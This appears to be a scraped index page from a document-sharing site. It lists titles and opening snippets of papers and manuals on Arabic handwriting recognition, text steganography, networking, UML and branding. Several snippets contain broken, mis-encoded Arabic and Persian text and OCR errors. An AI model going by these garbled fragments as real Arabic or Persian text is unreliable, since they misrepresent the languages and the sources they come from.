Journal of Computer Science 2012, 8 (11), 1859-1868 ISSN 1549-3636 2012 doi:10.3844/jcssp.2012.1859.1868 Published Online 8 (11) 2012 (http://www.thescipub.com/jcs.toc) Online Arabic Handwritten Character
More information2011 International Conference on Document Analysis and Recognition
20 International Conference on Document Analysis and Recognition On-line Arabic Handwrittenn Personal Names Recognition System based b on HMM Sherif Abdelazeem, Hesham M. Eraqi Electronics Engineering
More informationA MELIORATED KASHIDA-BASED APPROACH FOR ARABIC TEXT STEGANOGRAPHY
A MELIORATED KASHIDA-BASED APPROACH FOR ARABIC TEXT STEGANOGRAPHY Ala'a M. Alhusban and Jehad Q. Odeh Alnihoud Computer Science Dept, Al al-bayt University, Mafraq, Jordan ABSTRACT Steganography is an
More information0 0 0 E-mail : ccce@uob.edu.iq Site: cc.uobaghdad.edu.iq فتاه :00 :0 :00 :0 :00 :0 :00 :0 :00 :0 :00 :0 :00 :0 :00 :0 :00 :0 0 0 :00 :0 Online ICDL - - - ICDL - - - ICDL - - - - 0:00 :0 :0 :00 :0 :00 :0
More informationDeveloping a Real Time Method for the Arabic Heterogonous DBMS Transformation
Developing a Real Time Method for the Arabic Heterogonous DBMS Transformation S. M. Hadi, S. Murtatha Department of Information & Comm. Eng. College of Engineering Al- Khawarizmi,University of Baghdad
More information1 See footnote 2, below.
To: UTC From: Azzeddine Lazrek, Cadi Ayyad University, Marrakesh, Morocco (with Debbie Anderson, SEI, UC Berkeley, and with assistance from Murray Sargent, Laurentiu Iancu, and others) RE: Arabic Math
More informationDesign and Implementation of a Telemetry System for Environmental Applications
Al-Khwarizmi Engineering Journal, Vol. 5, No. 4, PP 39-50 (2009) Al-Khwarizmi Engineering Journal Design and Implementation of a Telemetry System for Environmental Applications Jabir S. Aziz Osama A. Hussein
More informationM. Rasti-Barzoki rasti.iut.ac.ir Management Information Systems
M. Rasti-Barzoki Management Information Systems : Data Flow Diagram PFD: Process Flow Diagram (PM: Process Model) FHD: Function Hierarchy Diagram DT: Decision Table 2 Entity Attribute 3 Data Elements The
More informationA methods of ensuring consistency between UML Diagrams طرق ضمان االتساق بيه مخططات النمذجة (UML)
A methods of ensuring consistency between UML Diagrams طرق ضمان االتساق بيه مخططات النمذجة (UML) Ihab L.Hussein Alsammak, Assistant lecturer Ministry of Education, Directorate General of Education of Karbala
More informationArabic Diacritics Based Steganography Mohammed A. Aabed, Sameh M. Awaideh, Abdul-Rahman M. Elshafei and Adnan A. Gutub
Arabic Diacritics Based Steganography Mohammed A. Aabed, Sameh M. Awaideh, Abdul-Rahman M. Elshafei and Adnan A. Gutub King Fahd University of Petroleum and Minerals Computer Engineering Department Dhahran
More informationNew Approach in Detection MAC Spoofing in a WiFi LAN
New Approach in Detection MAC Spoofing in a WiFi LAN Asst. Prof. Hamid Mohamed Ali Department of Computer Engineering College of Engineering Baghdad University Email: habdul_hussain@yahoo.com M.Sc. Student
More informationExploiting Multilingual Wikipedia to improve Arabic Named Entity Resources
Exploiting Multilingual Wikipedia to improve Arabic Named Entity Resources Mariam Biltawi, Arafat Awajan, Sara Tedmori, and Akram Al-Kouz King Hussein Faculty of Computing Sciences Princess Sumaya University
More informationAmerican University of Beirut Logo and Visual Identity Manual. April 2011 version 1.0
American University of Beirut Logo and Visual Identity Manual April 2011 version 1.0 Contents Introduction Why a Visual Identity System...4 Visual Identity Policy...4 AUB Logo AUB Logo...6 General Guidelines...7
More informationMain Brandmark. Alternative option 1: White torch and white logotype on orange background
Style Guide Main Brandmark Torch Logotype Preferred brandmark The RFE/RL brandmark consists of two elements 1) the torch and 2) the Radio Free Europe/ Radio Liberty logotype. These two elements should
More informationandroidcode.ir/post/install-eclipse-windows-android-lynda
ا موزش برنامه نويسی اندرويد آ زش ای ا رو ز ن ر دو, ۲۶ دی ۰۷:۰۶ ۱۳۹۰ ب.ظ مراحل نصب ايکليپس (Eclipse) روی ويندوز ی ) ( آ زش ا ا در و وز در pdf ا آ زش( 2.43 ( ۰. از ا اس دی رو ده (راھ ی.(SDK ۱.ا ای ا رو ازش
More informationThreads JPU (ALJAZEERA PRIVATE UNIVERSITY) د. باسم قصيبة Distributed Sys
Threads 1 Threads Indroduction Multi-threading (Ex) Threads & process Multi-threaded Server Architectures Thread Implementation Thread Scheduling Threads in Java Thread life-cycle Thread Building Mutual
More informationPrivacy Preserving in Data Mining أبقاء انغش ف حؼذ انب ا اث
Privacy Preserving in Data Mining أبقاء انغش ف حؼذ انب ا اث Assistant Lecturer/ Heba Adnan Raheem Master Computer Sciences Kerbala university/college of Sciences (Computer Department) Assistant Professor
More informationTHE LOGO Guidelines LOGO. Waste Free Environment Brand Guidelines
BRAND GUIDELINES THE LOGO Guidelines LOGO SYMBOL TYPEFACE 2 COLOR SCHEME When do I use the full-color logo? Use the full-color logo as frequently as possible to maximize and strengthen the brand. PRIMARY
More informationERD ENTITY RELATIONSHIP DIAGRAM
ENTITY RELATIONSHIP DIAGRAM M. Rasti-Barzoki Website: Entity Relationship Diagrams for Data Modelling An Entity-Relationship Diagram () shows how the data that flows in the system is organised and used.
More informationCH. 2 Network Models
Islamic University of Gaza Faculty of Engineering Computer Engineering Department Data com. Discussion ECOM 4014 Lecture # 2 CH. 2 Network Models By Eng. Wafaa Audah Sep. 2013 OSI Model Open Systems Interconnection
More informationNew Features in mpdf v5.6
New Features in mpdf v5.6 HTML5 tags New tags introduced in HTML5 now have basic support in mpdf, and will thus support CSS style references. The following are treated as block elements similar to :
More informationWriting Domain Names in Different Arabic Script Based Languages
Writing Domain Names in Different Arabic Script Based Languages Language VS. Script ICANN Regional Meeting, Dubai April 1-3 2008 Dr. Abdulaziz H. Al-Zoman Director of SaudiNIC - CITC Chairman of Steering
More informationResearch Article Offline Handwritten Arabic Character Recognition Using Features Extracted from Curvelet and Spatial Domains
Research Journal of Applied Sciences, Engineering and Technology 11(2): 158-164, 2015 DOI: 10.19026/rjaset.11.1702 ISSN: 2040-7459; e-issn: 2040-7467 2015 Maxwell Scientific Publication Corp. Submitted:
More informationNF-SAVO: Neuro-Fuzzy system for Arabic Video OCR
NF-SAVO: Neuro-Fuzzy system for Arabic Video OCR Mohamed Ben Halima, Hichem karray, Adel. M. Alimi REGIM: REsearch Group on Intelligent Machines University of Sfax, National School of Engineers (ENIS)
More informationRecognition of secondary characters in handwritten Arabic using Fuzzy Logic
International Conference on Machine Intelligence (ICMI 05), Tozeur, Tunisia, 2005 Recognition of secondary characters in handwritten Arabic using Fuzzy Logic Mohammed Zeki Khedher1 Ghayda Al-Talib2 1 Faculty
More informationIntegrator s Guide Tahoe-Veo Video Distribution System
Integrator s Guide Tahoe-Veo Video Distribution System 2 Table of Contents Table of Contents... 2 Introduction... 5 Important Safety Instructions... 5 Servicing... 5 Environmental Requirements... 5 AC
More informationUrdu Usage Guide ر ہاردو
ب" Urdu Usage Guide و 6 اردو ر This guide will explain how to use Urdu on the computer. After Urdu support has been installed and it is possible to toggle between English and Urdu, two additional items
More informationL2/11-033R 1 Introduction
To: UTC and ISO/IEC JTC1/SC2 WG2 Title: Proposal to add ARABIC MARK SIDEWAYS NOON GHUNNA From: Lorna A. Priest (SIL International) Date: 10 February 2011 1 Introduction ARABIC MARK SIDEWAYS NOON GHUNNA
More informationظرة ول. Information Technology ١
ظرة ول ات Information Technology Dr. Ahmed Abd El-Ghany Abd El-Ghany Ewees IT 14 Ewees Part 1 ١ وواوتھ : ھ ادة ا $% إ"! وا! وات إد+ل وإ+*اج أو '&ت أو أو ا"*"- 4"5 ز و $12 ا 1 م ا/ب إ" 4 زھ $&8 ا 2"5 ن
More informationBrand Identity Manual Fonts and Typography
Brand Identity Manual Fonts and Typography Brand Fonts NCB TYPE LANGUAGE To maintain a coherent brand identity, NCB uses a set of compatible and typefaces as its corporate primary fonts. These adjacent
More informationOff-line Arabic Handwritten OCR Based on Web Services
Off-line Arabic Handwritten OCR Based on Web Services By Khalil Ahmad Yassen Al-Sulbi FACULITY OF COMPUTING AND INFORMATION TECHNOLOGY KING ABDUL AZIZ UNIVERSITY JEDDAH SAUDI ARABIA Shaaban 1436 H 25 May
More informationIntroduction to Search and Recommendation
Introduction to Search and Recommendation Yi Zhang Associate Professor Information Retrieval and Knowledge Management Lab Graduate Director, Technology and Information Management University of California
More informationJournal of University of Thi Qar Vol. (10).. No. (2) June Influence of Multiple Encryptions on the Security and Accuracy of
Influence of Multiple Encryptions on the Security and Accuracy of Abstract Sent and Received Data Jehan K. Shareef Information systems (IS) jihansh@yahoo.com Media Faculty/ Thi- Qar University Encryption
More informationA) 9 B) 12 C) 24 D) 32 A) 9 B) 7 C) 8 D) 12 A) 400 B) 420 C) 460 D) 480 A) 16 B) 12 C) 8 D) 4. A) n+1 B) n - 1 C) n D) None of the above
1 4 4 ادب ر اور 2.ر ں رHistory3 ا ض ا رس ا ا ب A) 9 B) 12 C) 24 D) 32 ال 1 ں ا ا ر فا رس ا ب A) 9 B) 7 C) 8 D) 12 "BENZENE" وف ا ل ت ا ظ A) 400 B) 420 C) 460 D) 480 1 2 3 C B A اور D ں combinations ا 3
More informationCourse Weekly outline
Republic of Iraq The Ministry of Higher Education & Scientific Research Course Weekly outline University : Mosul University College : Computer and Math. Sciences Department : Software Engineering Stage
More informationMATHEMATICAL ANALYSIS OF SQUARE HOLE DRILLING MECHANISM
www.jeasd.org Vol. 22, No.01, January 2018 ISSN 2520-0917 MATHEMATICAL ANALYSIS OF SQUARE HOLE DRILLING MECHANISM Ridha Alwan Ahmed Asst. Lecturer, Computer Engineering Department, Al- Mustansiriyah University,
More informationUsing Arabic Wordnet for semantic indexation in information retrieval system
www.ijcsi.org 327 Using Arabic Wordnet for semantic indexation in information retrieval system Mohammed Alaeddine Abderrahim 1, Mohammed El Amine Abderrahim 2 Mohammed Amine Chikh 2 1 Department of Computer
More informationDESIGNING OFFLINE ARABIC HANDWRITTEN ISOLATED CHARACTER RECOGNITION SYSTEM USING ARTIFICIAL NEURAL NETWORK APPROACH. Ahmed Subhi Abdalkafor 1*
International Journal of Technology (2017) 3: 528-538 ISSN 2086-9614 IJTech 2017 DESIGNING OFFLINE ARABIC HANDWRITTEN ISOLATED CHARACTER RECOGNITION SYSTEM USING ARTIFICIAL NEURAL NETWORK APPROACH Ahmed
More informationLanguage Manual. Arabic HQ and HD
Language Manual Arabic HQ and HD Language Manual: Arabic HQ and HD Published 22 March 2011 Copyright 2003-2011 Acapela Group. All rights reserved This document was produced by Acapela Group. We welcome
More informationDesign and Analysis WLAN Nodes Performance Based on Roaming Technique
The Proceedings of the 4 th Conference of College of Education for Pure Sciences Design and Analysis WLAN Nodes Performance Based on Roaming Technique Khalil I. Alsaif Mosul University Computer Science
More informationCharacter Set Supported by Mehr Nastaliq Web beta version
Character Set Supported by Mehr Nastaliq Web beta version Sr. No. Character Unicode Description 1 U+0020 Space 2! U+0021 Exclamation Mark 3 " U+0022 Quotation Mark 4 # U+0023 Number Sign 5 $ U+0024 Dollar
More informationظرة ول. Information Technology
ظرة ول ات 2 Information Technology Dr. Ahmed Abd El-Ghany Abd El-Ghany Ewees IT 14 Ewees Part 2 ١ ن م ار ل م إ ث أم أ ر ١- ا%رت وا$ن ن ا#رات Declarative Statements ومانورفاءامادادالارل أءا!رات. -٢ ا()ت
More informationUSING COMBINATION METHODS FOR AUTOMATIC RECOGNITION OF WORDS IN ARABIC
USING COMBINATION METHODS FOR AUTOMATIC RECOGNITION OF WORDS IN ARABIC 1 AHLAM MAQQOR, 2 AKRAM HALLI, 3 KHALID SATORI, 4 HAMID TAIRI 1,2,3,4 Sidi Mohamed Ben Abdellah University, Faculty of Science Dhar
More informationNASTAALIGH HANDWRITTEN WORD RECOGNITION USING A CONTINUOUS-DENSITY VARIABLE-DURATION HMM
NASTAALIGH HANDWRITTEN WORD RECOGNITION USING A CONTINUOUS-DENSITY VARIABLE-DURATION HMM Reza Safabakhsh and Peyman Adibi Computational Vision/Intelligence Laboratory Computer Engineering Department, Amirkabir
More informationReal Time Face Recognition Based on Matlab and Arduino Microcontroller
Real Time Face Recognition Based on Matlab and Arduino Microcontroller Lecturer Dr. Abbas Hssien Miry AL- Mustansiriyah University, Electrical Engineering Department Abstract Recently the access control
More informationBÉZIER CURVES TO RECOGNIZE MULTI-FONT ARABIC ISOLATED CHARACTERS
BÉZIER CURVES TO RECOGNIZE MULTI-FONT ARABIC ISOLATED CHARACTERS AzzedineMazroui and AissaKerkourElmiad Faculty of Sciences, Oujda, Morroco azze.mazroui@gmail.com, kerkour8@yahoo.fr ABSTRACT The recognition
More informationFeature Extraction Techniques of Online Handwriting Arabic Text Recognition
2013 5th International Conference on Information and Communication Technology for the Muslim World. Feature Extraction Techniques of Online Handwriting Arabic Text Recognition Mustafa Ali Abuzaraida 1,
More informationExploit Development. License. Contents. General notes about the labs. General notes about the labs. Preparation. Introduction to exploit development
Exploit Development License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. All included software source
More informationGEOMETRIC-TOPOLOGICAL BASED ARABIC CHARACTER RECOGNITION, A NEW APPROACH
GEOMETRIC-TOPOLOGICAL BASED ARABIC CHARACTER RECOGNITION, A NEW APPROACH HAMED TIRANDAZ, MOHSEN AHMADNIA AND HAMIDREZA TAVAKOLI Electrical and Computer Engineering Department, Hakim Sabzevari University,
More informationYazd University. Homepage:
ا Vali Derhami, Razieh Sheikhpour Electrical and Computer Engineering Department Yazd University Homepage: Http://ce.yazd.ac.ir/derhami Email: vderhami@yazd.ac.ir Email: r_sheikhpour@yahoo.com IT ون ا
More informationThe University of Bradford Institutional Repository
The University of Bradford Institutional Repository http://bradscholars.brad.ac.uk This work is made available online in accordance with publisher policies. Please refer to the repository record for this
More informationThe Use of Dynamic Sliding Window with IPSec. إستخدام نافذة اإلنزالق الديناميكية مع تقنية IPSec
The Proceedings of the 4 th Conference of College of Education for Pure Sciences The Use of Dynamic Sliding Window with IPSec Mishall H. Awaad Department of Computer Science, Education College, Thi-Qar
More informationPacket Steganography Using IP ID. Abstract
Packet Steganography Using IP ID *1 Head of Computer Science Department, Collage of Science, University of Diyala, Iraq 2* Computer Eng., University of Technology, Baghdad, Iraq Received 21 January 2014
More informationIntroduction to Search/Retrieval Technologies. Yi Zhang Information System and Technology Management IRKM Lab University of California Santa Cruz
Introduction to Search/Retrieval Technologies Yi Zhang Information System and Technology Management IRKM Lab University of California Santa Cruz 1 Information Retrieval and Knowledge Management Lab Focus:
More informationار ا ار ا ا م ا وا وال. ٢٩ ٢٥ ذار ٢٠١٢
ار ا ار ا ا م ا وا وال ا اى ا د. ا ي mustafa.eleoui@hiast.edu.sy meleoui@gmail.com ٢٩ ٢٥ ذار ٢٠١٢ ات ه م LATEX أ"!ا ام )& +,ا )*ا XeArabic (& ا'&%ل %ا -./*ا ا%دت 2) 3 آ&( ل %4 ا 78 رات ا%*6- إدراج ا; 7
More informationMultifont Arabic Characters Recognition Using HoughTransform and HMM/ANN Classification
50 JOURNAL OF MULTIMEDIA, VOL. 1, NO. 2, MAY 2006 Multifont Arabic Characters Recognition Using HoughTransform and HMM/ANN Classification Nadia Ben Amor National Engineering School of Tunis, Tunisia n.benamor@ttnet.tn,
More informationب ام خذا ذ بخش ذ ه زباى
ب ام خذا ذ بخش ذ ه زباى ع اى هذرک : بز اه یسی PLC FATEK ایجاد ارتباط با FATEK PLC 9 1 ا.رضایی 1391.7.27 ت ضیحات : تعذاد صفح : شوار یزایش : یزایش ک ذ : تاریخ یزایش : +9821-228-831-70 1 www.dornamehr.com
More informationNafees Nastaleeq v1.01 beta
Nafees Nastaleeq v1.01 beta Release Notes November 07, 2007 CENTER FOR RESEARCH IN URDU LANGUAGE PROCESSING NATIONAL UNIVERSITY OF COMPUTER AND EMERGING SCIENCES, LAHORE PAKISTAN Table of Contents 1 Introduction...4
More informationPersian/Arabic Baffletext CAPTCHA 1
Journal of Universal Computer Science, vol. 12, no. 12 (2006), 1783-1796 submitted: 20/3/06, accepted: 22/12/06, appeared: 28/12/06 J.UCS Persian/Arabic Baffletext CAPTCHA 1 Mohammad Hassan Shirali-Shahreza
More informationInformation Extraction from Arabic News
www.ijcsi.org 114 Information Extraction from Arabic News Hala Elsayed 1, Tarek Elghazaly 2 1 Computer and Information Sciences Dept., ISSR, Cairo University Cairo, Egypt 2 Computer and Information Sciences
More informationDevelopment Binary Search Algorithm
Development Binary Search Algorithm Ragheed D. Salim* Received 3, January, 2011 Accepted 22, May, 2011 Abstract: There are many methods of searching large amount of data to find one particular piece of
More information